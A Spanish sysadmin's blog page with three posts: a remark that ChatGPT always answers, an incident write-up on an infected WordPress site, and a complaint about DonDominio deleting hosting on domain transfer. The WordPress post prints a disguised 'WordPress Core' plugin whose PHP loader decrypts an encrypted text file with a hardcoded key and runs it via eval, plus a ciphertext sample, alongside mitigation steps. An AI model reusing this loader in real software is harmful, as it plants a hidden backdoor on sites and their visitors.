Últimas entradas en el blog


Chatgpt no sabe estar callado

Fecha: 2024-06-15 18:42:22
Autor: Alex Rubio

Chatgpt no sabe estar callado

El auge de la inteligencia artificial es, sin lugar a dudas, uno de los temas más candentes de la actualidad. Sin embargo, la prueba que he llevado a cabo demuestra que ChatGPT, una de las IA más avanzadas disponibles, aún no posee la capacidad de mantenerse en silencio cuando es necesario. Siempre ofrece una respuesta para todo, lo cual contrasta significativamente con las reacciones típicamente humanas.

Este comportamiento me lleva a la conclusión de que la inteligencia artificial todavía está lejos de servir a los humanos de una manera verdaderamente coherente y natural. A continuación, presento un ejemplo que ilustra esta limitación.

En este ejemplo, se puede observar cómo ChatGPT insiste en proporcionar una respuesta, aunque la situación ideal requeriría una pausa o un momento de reflexión. Este es un recordatorio de que, a pesar de los impresionantes avances tecnológicos, la emulación de la complejidad y sutileza de las interacciones humanas sigue siendo un desafío significativo para la inteligencia artificial. Aún queda un largo camino por recorrer para que las IA puedan interactuar con nosotros de una forma que se sienta auténtica y verdaderamente útil.

 



Artículo sobre la Infección en WordPress

Fecha: 2024-06-15 17:03:08
Autor: Alex Rubio

Artículo sobre la Infección en WordPress

Como administrador de sistemas, a veces uno se encuentra en situaciones en las que es complicado saber cómo y por qué se ha sufrido una infección. Esto se debe principalmente a la presencia de sitios web que no han sido creados por nosotros y que, a menudo, incorporan "sorpresas" no muy agradables. En este caso, y como en la mayoría de los casos, se trata de un WordPress, donde la falta de instalación o actualización de los plugins ha permitido a los hackers acceder al sistema.

El hecho de que cualquiera pueda instalar plugins de WordPress es muy democrático, pero tiene sus desventajas. No todos los creadores de plugins son buenos programadores y, diariamente, se descubren plugins vulnerables. Los usuarios o clientes de la web no suelen entender que un sitio web parece estar "vivo" y que no es fácil mantenerlo libre de código mal hecho o de creadores que han dejado de dar soporte. El mundo gratuito democratiza, pero complica la seguridad, ya que no hay que confundir el voluntarismo con el profesionalismo.

Así pues, este es uno de los casos que me he encontrado. El hecho de que los hackers puedan subir archivos a la estructura de WordPress hace que nos encontremos con archivos php.ini como este:

Archivos .htaccess modificados o insertados en innumerables directorios para otorgar permisos de ejecución a programas que no deberían tenerlos, como este comando en .htaccess:

DirectoryIndex index.php index.html index.htm
 

El comando DirectoryIndex en el archivo .htaccess especifica qué archivos debe buscar el servidor web cuando se accede a un directorio sin especificar un archivo concreto. En este caso, la línea:

indica al servidor que, al acceder a un directorio, debe buscar primero un archivo llamado index.php. Si no encuentra ese archivo, buscará uno llamado index.html. Si tampoco encuentra ese, buscará index.htm. Este orden de búsqueda permite a los administradores del sitio web controlar qué archivo se muestra por defecto cuando se accede a un directorio.

También es fácil encontrar plugins que, aparentemente, tienen nombres rimbombantes y lógicos, usando la ingeniería social para no llamar la atención. Hoy me he encontrado con uno de esos casos. ¿Quién dudaría de un plugin llamado "WordpressCore" o de uno llamado "google-seo-rank"? ¡Ay, Dios mío! ¡Alma de cántaro! ¿Quién te iba a decir que las cosas serían así...?

Estos plugins, además de asegurarse el control de la web para siempre, engañan a los usuarios mediante una llamada externa a un JavaScript, haciendo aparecer un mensaje de que tienen un problema con el navegador. Por supuesto, cada vez están mejor diseñados. Luego, hacen que los usuarios ejecuten un comando con privilegios de administrador para infectar sus máquinas. Aquí tienes un ejemplo de uno de esos encantadores scripts:

https://cdn.ethers.io/lib/ethers-5.2.umd.min.js

Medidas de Mitigación

Para mitigar esta amenaza:

  1. Eliminar los Archivos Maliciosos: Inmediatamente eliminar los archivos php.ini, .htaccess, include.php, los archivos .txt sospechosos y el plugin google-seo-rank asi como el WoprdpressCore
  2. Revisar Configuraciones de PHP: Asegurarse de deshabilitar funciones peligrosas y restringir el acceso a directorios.
  3. Actualizar Plugins y Temas: Mantener todos los plugins y temas actualizados.
  4. Monitoreo y Auditoría: Implementar soluciones para detectar cambios no autorizados.
  5. Escaneo de Malware: Utilizar herramientas de escaneo de malware para identificar y eliminar código malicioso.

Ejemplo de ficheros .txt con contenido malicioso:


R9ir+PJYkX98tjPI4LYFFw==

kvEf4UKzNsfWCXAgWVMZZuM1wklOwQ61oz0zp7HLWoNgyJ6xXBcfPj/VunrYkI088/T+ybU68Q0dmS0utVONQiFouBH/mjfkv6ClxqMUdJiCaN2khi5sbuHmGYeQF46QIU/UKYBzNH0gDXw10Q340SV40a6kpLvSqtEYG6jX6DalY+nI4pQ1jaSdDlV7yC7oYsVsSeZR7zapMNU8vf9VYi1/E0ph3BPDNaE0NEhWhF0DDN4eVN0lZUTox7uv+IZMZicVj+GnecYDNMUOLkRqFCgmhZZdZ4/3JYf6Yqy6xDwjzGialvwnxvxOeJuuCJ4Y4re7NZEoTVTSKY1eahbr+BOc9JB9GrAPI+oBladyxY5/C34FkyOkq1LdN0OfqjLq+LAf8onH491bXR0nQ0eBxUaIFIP8u1Y0b2WQIO2ayV6zcnCOrUF0kKLT3Vn2FB9mUqjRtg3ukY8gadTCEqNnT+5hpIILi0qhWAzMjs1FyI+HA1HR2hUf+Tm+IT818/DREH6ugnJcxwJARRQNetpYN3KO+EJcll2kbRtpIROgSb1HjdtUVIR0O12U/yjhI3IQLPQT7fcXQkDM+JzY/CfY4ljJSgRsRFmI626v9Vxz8qWWjUoqbvBDDTpl8DiCC/F/qua6tkHzVqan5dho7AH7hVdJPcn74ncQKi4SbDdY2VA/epSjdFi2zrXI8KrD0HbJsmhL76Jh"

 

Que despues es decodificado mediante codigo php como este:


/**
 * @package Wordpress_Core
 * @version 1.7.3
 */
/*
Plugin Name: WordPress Core
Plugin URI: https://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.7.3
Author URI: https://wordpress.org/
*/
class UnsafeCrypto
{
 const METHOD = "aes-256-ctr";
 public static function decrypt($message, $nonce, $key, $encoded = false)
 {
  if ($encoded) {
   $message = base64_decode($message, true);
   $nonce = base64_decode($nonce, true);
   if ($message === false || $nonce === false) {
    throw new Exception('Encryption failure');
   }
  }
  $plaintext = openssl_decrypt(
   $message,
   self::METHOD,
   $key,
   OPENSSL_RAW_DATA,
   $nonce
  );
  return $plaintext;
 }
}
$key = hex2bin('af64a08c9cf0b2070726e52e2fb78f02a9615726758db69ad8d9de140806707c');
$parts = file('./vwbulbzhnj.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true);
eval($decrypted);



Mi experiencia y opinion con DonDominio

Fecha: 2024-06-14 06:52:45
Autor: Alex Rubio

Mi experiencia y opinion con DonDominio

En los últimos meses, tuve una experiencia realmente decepcionante con la empresa de registro de dominios y hosting web, DonDominio. Lo que descubrí a través de este proceso es algo que considero crucial compartir, ya que puede afectar directamente a cualquier cliente actual o potencial de esta empresa.

El Problema con la transferencia de dominios

En primer lugar, es importante entender cómo funciona el servicio de DonDominio. Cuando pagas por un dominio en DonDominio, este dominio está intrínsecamente ligado al hosting que también puedes contratar con ellos. Esto puede parecer conveniente a primera vista, pero hay una trampa significativa que no es muy conocida y que puede tener consecuencias graves.

Si decides trasladar tu dominio a otro proveedor, debes estar al tanto de que el hosting asociado con DonDominio, incluso si está pagado por completo, se eliminará automáticamente junto con todos sus datos. Esto incluye no solo la página web, sino también todos los servicios adicionales contratados, como el correo electrónico.

La experiencia de un cliente

Uno de mis clientes recientemente experimentó este problema de primera mano. Tenía tanto el dominio como el hosting con DonDominio y decidió transferir su dominio a otro proveedor sin saber que esta acción resultaría en la eliminación de su página web y todos los correos electrónicos asociados. La pérdida de datos fue descomunal y el impacto negativo sobre su negocio fue inmediato. Toda la información y los correos importantes almacenados en su servidor se perdieron sin previo aviso ni posibilidad de recuperación.

La respuesta de DonDominio

Al contactar con DonDominio para intentar resolver el problema, nos indicaron que la solución era crear un ticket en su página web. Según su respuesta, enviarían un correo electrónico con una copia de seguridad de todos los datos para poder ser restaurados. Aunque esta solución podría parecer adecuada, presenta un grave inconveniente: si no tienes una cuenta de correo electrónico fuera del dominio afectado, te encuentras en un bucle sin salida. No puedes recibir el correo con la copia de seguridad porque tu cuenta de correo también fue eliminada.

¿Por qué es importante?

Este problema es de una magnitud considerable y la falta de información clara y accesible sobre esta política de DonDominio es preocupante. Los clientes deberían ser informados explícitamente de que la transferencia de un dominio resultará en la eliminación de su hosting y todos los datos asociados.

Asi pues, es vital que cualquier persona que esté considerando contratar servicios de dominio y hosting con DonDominio entienda esta política. La falta de transparencia en este aspecto puede llevar a pérdidas significativas de datos y servicios, algo que sucedió a mi cliente y que espero no le ocurra a nadie más. Asegúrate de tener copias de seguridad actualizadas y una cuenta de correo alternativa antes de realizar una transferencia de dominio. La experiencia de mi cliente con DonDominio ha sido una lección costosa y espero que este artículo sirva como advertencia para otros.

En resumen, asegúrate de estar bien informado y preparado antes de hacer cambios en tus servicios de dominio y hosting. La información y la precaución pueden ahorrarte muchos problemas en el futuro.